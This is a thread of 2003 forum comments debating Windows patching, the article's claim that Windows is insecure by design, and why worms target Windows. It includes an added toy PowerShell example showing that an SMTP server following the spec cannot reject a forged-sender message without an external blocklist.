    The quote from this article in a highly visible magazine is:

    The chance of a patch wrecking Windows is dwarfed by the odds that an unpatched PC will get hit. And for those saying they don't trust Microsoft to fix their systems, I have one question: If you don't trust this company, why did you give it your money?
    (emphasis mine).

    This is the one question. Why are there so many technical people that, knowing all the risks and odds, still don't dare patch the systems for fear that the cure will be worse than the disease?

    I know that the writer is mostly concerned with all the ignorant people at home, but when Microsoft itself tells people to not connect to the Internet because of security concerns, then logic fails. How should these people get their updates then?!

    Enough ranting since chances of this being read are small anyway. No sense in wasting time.
    --
    Karma? What's that again?
  116. "insecure by design" explained by eddeye · · Score: 4, Interesting

    As someone who works in security, "insecure by design" has a precise meaning to me, which I've not seen mentioned here yet. The developer's intentions have nothing to do with it. "Insecure by design" means every implementation of a given system will share a common set of security vulnerabilities. In other words, the design (think API or protocol) itself is flawed. No implementation is safe.

    Example: The design of the http protocol does not provide any method of running arbitrary code from the client on the server. A perfectly implemented web server will contain no remote vulnerabilities of this type. Flaws in particular web servers like IIS are caused by mistakes in the implementation, not the http protocol itself. The protocol is secure by design with regard to this attack.

    Contrast this with a protocol whose design is insecure. Nothing in the SMTP spec addresses the issue of spam. High-volume anonymous message injection is allowed by the protocol. Solutions to spam have to be implemented externally with things like blacklists and filters (which are considered external even when run during the SMTP transaction as they aren't part of the SMTP protocol itself). No SMTP server, no matter how perfectly implemented, can both completely follow the SMTP spec and reject all spam. Thus SMTP is insecure by design with regard to spam.

    Nebulous terms like "windows" and "secure" mean next to nothing by themselves. What is "windows"? The NT kernel? The win32 API? The set of programs and services enabled by a default install? Secure against what types of attacks?

    For reasonable definitions of the above, the statement "Windows is insecure by design" certainly makes sense. Take "windows" to mean the win32 API and "secure" to mean enforcement of access control. Remember the shatter attacks discovered last year? That's a flaw in the design of the win32 API. No implementation is safe. It fits the definition of "insecure by design" perfectly. And Microsoft has alluded to more such vulnerabilities lurking in the win32 API (remember when they said they couldn't reveal all the APIs for security reasons?).

    --
    Democracy is two wolves and a sheep voting on lunch.
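
The SMTP half of the argument above can be shown rather than argued. The PowerShell below is an added example, not the poster's code: a toy server-side command handler that implements only the command sequence and address syntax RFC 5321 defines, fed a constructed session with a forged envelope sender. Everything the protocol lets the server check passes. The only way to refuse the message is the $Policy script block, which decides from data (a constructed host blocklist) that is not part of the SMTP exchange at all. Function and parameter names are mine; the session and the blocklist are made up.

```powershell
# Added example (not from the post): a minimal RFC 5321 command handler with
# an external policy hook. Names and the sample session are constructed.

function Invoke-SmtpSession {
    param(
        [Parameter(Mandatory)] [string[]] $ClientLines,
        [string]      $ClientHost = 'unknown',
        [scriptblock] $Policy     = { $true }   # outside the protocol: $true accepts the envelope
    )
    $state = 'Start'; $from = $null; $rcpt = @()
    foreach ($line in $ClientLines) {
        $verb, $arg = $line -split ' ', 2
        $reply = switch ($verb) {
            'EHLO' { $state = 'Greeted'; '250 mx.example.test' }
            'MAIL' {
                if     ($state -ne 'Greeted')                         { '503 Bad sequence of commands' }
                elseif ($arg -notmatch '^FROM:<(?<path>[^>]*)>$')     { '501 Syntax error in parameters' }
                # The spec only asks whether the reverse-path is well formed.
                # "Is this sender really that address?" is not a question SMTP has.
                else   { $from = $Matches.path; $state = 'Mail'; '250 OK' }
            }
            'RCPT' {
                if     ($state -notin 'Mail','Rcpt')                  { '503 Bad sequence of commands' }
                elseif ($arg -notmatch '^TO:<(?<path>[^>]+)>$')       { '501 Syntax error in parameters' }
                else   { $rcpt += $Matches.path; $state = 'Rcpt'; '250 OK' }
            }
            'DATA' {
                if     ($state -ne 'Rcpt')                            { '503 Bad sequence of commands' }
                # Protocol satisfied; anything that rejects now is local policy,
                # not SMTP. (A real server would go on to read the message body.)
                elseif (& $Policy $ClientHost $from $rcpt)            { $state = 'Data'; '354 Start mail input' }
                else                                                  { '550 Rejected by local policy' }
            }
            'QUIT'  { '221 Bye' }
            default { '500 Command not recognized' }
        }
        "C: $line"
        "S: $reply"
    }
}

# Constructed session: the sending host claims an envelope sender it does not own.
$session = 'EHLO zombie.example',
           'MAIL FROM:<innocent@example.org>',
           'RCPT TO:<victim@example.com>',
           'DATA',
           'QUIT'

# 1. Spec-only behaviour: every command gets a 2xx/3xx reply.
Invoke-SmtpSession -ClientLines $session -ClientHost 'zombie.example'

# 2. Same handler, with a blocklist bolted on. The protocol code is untouched;
#    the rejection comes from data the exchange itself never carried.
$blocklist = @('zombie.example')   # constructed stand-in for a DNSBL lookup
Invoke-SmtpSession -ClientLines $session -ClientHost 'zombie.example' `
    -Policy { param($client, $from, $rcpt) $client -notin $blocklist }
```

Run 1 ends in "354 Start mail input" for the forged sender; run 2 ends in "550 Rejected by local policy" with the same input. Nothing between those two runs changed in the part of the code that implements SMTP, which is the sense in which the protocol, rather than any one server, is the thing that cannot reject spam.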
  117. Re:JRTFA by nicklott · · Score: 2, Insightful

    I'm running Windows Update now, and hey whaddya know.. 17Mb... that's gonna take a while on my 56k dialup. Hmmm... Maybe I won't run it after all..

  118. Insecure by design? by EddWo · · Score: 2, Insightful

    I'd like to know if this is really true.

    When the NT kernel was being designed it had security in mind. There are varying levels of privilege, access control lists for the file system and system objects, etc. Some of these features are only appearing in Linux now with 2.6.

    Sure, there have been flaws in the implementation: services turned on, running with system-level privileges, with ports exposed to the Internet. So Windows the system is not secure out of the box. But is it insecure by design?

    A lot of people run Windows as an administrator because programs written in the 9x era were not designed with the security model in mind. Programs want to access system-level files or registry settings. Windows XP brought the two product lines together, but in order to maintain the backwards compatibility they had to sacrifice the security.

    Also people hate hitting security barriers whenever they want to reconfigure something.

    I would like to see some evidence that a box running NT can NEVER be secure due to its design, rather than just not being currently secure due to its implementation.

    All the trolls about MSLinux seem to assume that NT is a terrible kludge that MS ought to abandon and just build a Windows GUI over Linux like Apple did over BSD.

    Is NT really flawed in its design or is it just the layers of services, APIs and backwards compatibility fixes that make the current implementations of NT vulnerable.

    If all Win32 apps were sandboxed the way win16 apps are and MS migrated to a new API would this solve a lot of the problems?

    I would welcome links to articles about this.

    --
    "Taligent is still pure vapor. Maybe they'll be the last who jumps up on Openstep... "
  119. Re:JRTFA by jonadab · · Score: 2, Informative

    > Tell your friends: Don't preview email. Delete email you don't know or trust. Don't open attachments if they're not absolutely known and expected. Update early and often.

    No. Tell them to go to www.pmail.com and get Pegasus Mail, and read email with that. "Don't use Outlook. It's too dangerous."

    --
    Cut that out, or I will ship you to Norilsk in a box.
  120. Naive by StormReaver · · Score: 2, Interesting

    "The chance of a patch wrecking Windows is dwarfed by the odds that an unpatched PC will get hit."

    Yet my workplace has had several problems directly caused by Windows updates. It's not frequent, but it's happened far more often than it should. It would be different if the problems were intentional and documented (see Red Hat example below), but they weren't. We had to roll back the patches and intentionally leave ourselves vulnerable until the next patch that fixed the prior patch was released.

    I have had only one Red Hat security fix that caused (minor) problems with one of the Linux systems (the web server). An Apache upgrade was made in which the configuration format for one option (I can't remember which one) was changed, making the current configuration non-functional. However, this was planned by the Apache Group and was documented in the upgrade RPM. A simple tweak to the configuration file brought the service back, and life went on.

    "And for those saying they don't trust Microsoft to fix their systems, I have one question: If you don't trust this company, why did you give it your money?"

    This is a bone-headed question. They gave Microsoft their money because they had to. Most people still don't know anything but Microsoft. They blindly hand over their money year after year because, thanks to Microsoft's abuse of its monopoly position, they don't have a choice.

  121. Re:Total Windows XP updates by Anonymous Coward · · Score: 2, Informative

    Here's what was installed on my XP machine at work:
    Successful  Thursday, August 21, 2003    Security Update for Microsoft Data Access Components (823718)
    Successful  Thursday, August 21, 2003    August 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1 (822925)
    Successful  Wednesday, July 30, 2003     Windows Error Reporting: Recommended Update (Windows XP)
    Successful  Thursday, July 24, 2003      Q322011: Recommended Update
    Successful  Thursday, July 24, 2003      Recommended Update for Windows XP SP1 (817778)
    Successful  Thursday, July 24, 2003      DirectX 9.0b End-User Runtime
    Successful  Thursday, July 24, 2003      Security Update for Microsoft Windows (819696)
    Successful  Thursday, July 17, 2003      821557: Security Update (Windows XP)
    Successful  Thursday, July 17, 2003      Security Update for Windows XP (823980)
    Successful  Friday, July 11, 2003        817606: Security Update (Windows XP)
    Successful  Friday, July 11, 2003        823559: Security Update for Microsoft Windows
    Successful  Friday, June 27, 2003        Hp Printer Driver Version 4.20.4100.430
    Successful  Friday, June 27, 2003        Q282010: Recommended Update for Microsoft Jet 4.0 Service Pack 7 (SP7) - Windows XP
    Successful  Thursday, June 26, 2003      327979: Recommended Update
    Successful  Thursday, June 26, 2003      DirectX 9.0a End-User Runtime
    Successful  Tuesday, June 24, 2003       Microsoft .NET Framework version 1.1
    Successful  Tuesday, June 24, 2003       814995: Recommended Update
    Successful  Tuesday, June 24, 2003       331953: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       329170: Security Update
    Successful  Tuesday, June 24, 2003       811630: Critical Update (Windows XP)
    Successful  Tuesday, June 24, 2003       Q329048: Security Update
    Successful  Tuesday, June 24, 2003       Q323255: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       Microsoft .NET Framework Service Pack 2, English Version
    Successful  Tuesday, June 24, 2003       814078: Security Update (Microsoft Jscript version 5.6, Windows 2000, Windows XP)
    Successful  Tuesday, June 24, 2003       817787: Security Update Windows Media Player for XP
    Successful  Tuesday, June 24, 2003       810577: Security Update
    Successful  Tuesday, June 24, 2003       810833: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       810565: Critical Update
    Successful  Tuesday, June 24, 2003       328310: Security Update
    Successful  Tuesday, June 24, 2003       Q329115: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       Q329390: Security Update
    Successful  Tuesday, June 24, 2003       Q329834: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       814033: Critical Update
    Successful  Tuesday, June 24, 2003       Q329441: Critical Update
    Successful  Tuesday, June 24, 2003       Q815021 XP: Security Update
    Successful  Tuesday, June 24, 2003       816093: Security Update Microsoft Virtual Machine (Microsoft VM)
    Successful  Tuesday, June 24, 2003       Q817287: Critical Update (Catalog Database Corruption in Microsoft Windows XP)
    Successful  Tuesday, June 24, 2003       811493: Security Update (Windows XP)
    Successful  Tuesday, June 24, 2003       330994: April 2003, Security Update for Outlook Express 6 SP1
    Successful  Tuesday, June 24, 2003       818529: June 2003, Cumulative Patch for Internet Explorer 6 Service Pack 1
    Canceled    Monday, June 23, 2003        Microsoft .NET Framework version 1.1
    Failed      Monday, June 23, 2003        DirectX 9.0a End-User Runtime
    Successful  Thursday, November 01, 2001  Windows XP Update Package, October 25, 2001
    S

  122. Popularity or OS design by Martok7 · · Score: 2, Insightful

    Not that I am a Windows fan, but if Mac or Linux was the most popular OS, wouldn't most viruses and worms target these systems? Windows might have its security problems, but I see new updates and security patches on my RedHat boxes all the time. Couldn't these exploits be used for viruses if virus creators targeted Linux or Mac?

    --
    I never liked you
  123. Re:why don't you want flash installed... by Technician · · Score: 2, Informative

    It's simple. No end user control. Ever try to read the news on a Yahoo page that has all options missing except about Macromedia Flash?
    The only way to turn off the noise was to remove the player. Until they fix the problem of no user control, it won't run on my systems.

    Simple, always-functioning stop and play buttons are all that is needed, but they are lacking in many in-your-face blinking, wiggling, distracting ads. Even ESC, which stops animated GIFs, is non-functional on Flash. The stop button does nothing, right-clicking to uncheck Play does not work; only removal works 100% of the time. It's the same reason the blink tag was so hated.
    Since I don't need to see all the trivial stuff to read the news, I just do without the player, as it's the easiest way to kill the video noise.

    --
    The truth shall set you free!
  124. RTFA by mobileskimo · · Score: 2, Insightful

    You obviously didn't RTFA.

    You:
    people create virii for windows because that's what people use, not because it's more insecure than other OS's. When linux gets more popular people will start making virii for it.

    Rob Pegoraro:
    The usual theory has been that Windows gets all the attacks because almost everybody uses it. But millions of people do use Mac OS X and Linux, a sufficiently big market for plenty of legitimate software developers -- so why do the authors of viruses and worms rarely take aim at either system?
    Even if that changed, Windows would still be an easier target. In its default setup, Windows XP on the Internet amounts to a car parked in a bad part of town, with the doors unlocked, the key in the ignition and a Post-It note on the dashboard saying, "Please don't steal this."


    As to why this was posted on Slashdot? For the bashers. It's good to wake up in the morning and feel righteous. But seriously, it's a good summary for those that keep arguing this point, that is if people would bother to RTFA. It also puts a little more credibility into it than the average slashdot troll.

    --
    "Last one in is a rotten goblin!" - Kepp
  125. Windows' problem not insecure by design IMO by theolein · · Score: 3, Interesting

    As an ex Windows admin, the thing that I found most difficult about Windows was not a lack of security by design. Downloading the patches and keeping the AV up to date will suffice normally. No, the problem of Windows, to me, lies in that it is a fucking mess.

    This may sound ludicrous in view of the jungle that one faces when one moves through a *nix directory tree on the command line (e.g. why is there /bin, /usr/bin, /usr/local/bin etc., confusing for a newbie), but the fact that Windows has literally tens of dozens of directories that belong to the system, that are both undocumented and not self-explanatory, as well as the registry, which is an inconsistent fucking mess if there ever was one, are things that make Windows a pain.

    On top of this there are so many design decisions that are superficially a good idea, but make things hell when one goes beneath the hood. An example is the desktop. From a visual point of view it might make sense to only store data in My Documents and below that, which is also encouraged by the open/save dialogue, but My Documents sits in a deep sub-folder in the real directory tree. The actual dialogue boxes of so many system controls are anything but friendly. While the wizards make things simple in a linear way, they are a stop-gap measure screwed on top of a system that is anything but consistent and visually well thought out otherwise.

    To me it seems that MS designs its system in that the core OS team has first go at making the bitch work, and after they are done, the mess is passed on to the UI team, which then has the pleasure of slapping crap like wizards and My Documents and tons of irritating marketing reminders (Passport, Messenger bla bla bla, hide those icons so you can't find them again) on top of the system so that MS can call it "user friendly".

    Fucking bullshit.

  126. Re:Total Windows XP updates by Brendan+Byrd · · Score: 2, Funny

    Read the rest of this comment...

    That, in and of itself, is funny.

  127. Terrorists, vulnerabilities, and liability? by gone.fishing · · Score: 2, Interesting

    One of the things that I fear the most is an actual terrorist attack using viruses to completely disrupt our financial system. It could be pretty simple and still be successful simply because the countries that have the money are the same countries that the terrorists are targeting! While countries like Iran would be "hit" they would not suffer nearly the damage that countries like the U.S. and Great Britain would. Because of this possibility, I think it is very important that the free countries of the world take immediate steps to harden themselves against computer-based terrorism, worms, viruses, and other security issues.

    I think that there is poor security designed into Windows. Microsoft knows how to design adequate security, as proof of that look at the X-box. It is quite secure. This probably means that a future generation operating system is going to take the "lessons learned" from the X-box and apply them to that new O/S. This will be the PR story at least. The truth will be closer to MS obtaining a software monopoly on the Windows platform. They will control licenses for it and will require your source code for evaluation before you get the key that will allow installation.

    Perhaps poor security is better than the alternative that M$ will dream up. They are driven by profit (every company is) and will take full advantage of any opportunity that they control (as they have already demonstrated).

    After the past couple of weeks, it is obvious that there is a business opportunity out there for someone OTHER THAN MICROSOFT to offer a product for Windows that is a full featured security system for desktops (and servers).

    I'm wondering what this kind of system would entail? How could you provide exceptional security to everything from a home PC to an enterprise-level network? There are some obvious things like firewalls, anti-virus protection, automated patches, controls for security and permissions, and so on. But there are other things that could be done too. How about a key system for executing software? If the key does not exist then the software (exe, process, driver, whatever) simply does not get permission to run. What about software that monitors network traffic, and when certain limits are exceeded human intervention is required or the PC is taken offline?

    I am also wondering about the ethical issues associated with all of this. If Ford puts a car on the road that they know is unsafe and an accident happens, they have liability. If I drive a car knowing that it is unsafe, I have liability. If the state allows a road to go unrepaired, they have liability. Isn't the same thing true for a software product? In today's world, in this litigious society, isn't M$ opening themselves up to a great deal of liability when their software is a swiss cheese of vulnerabilities?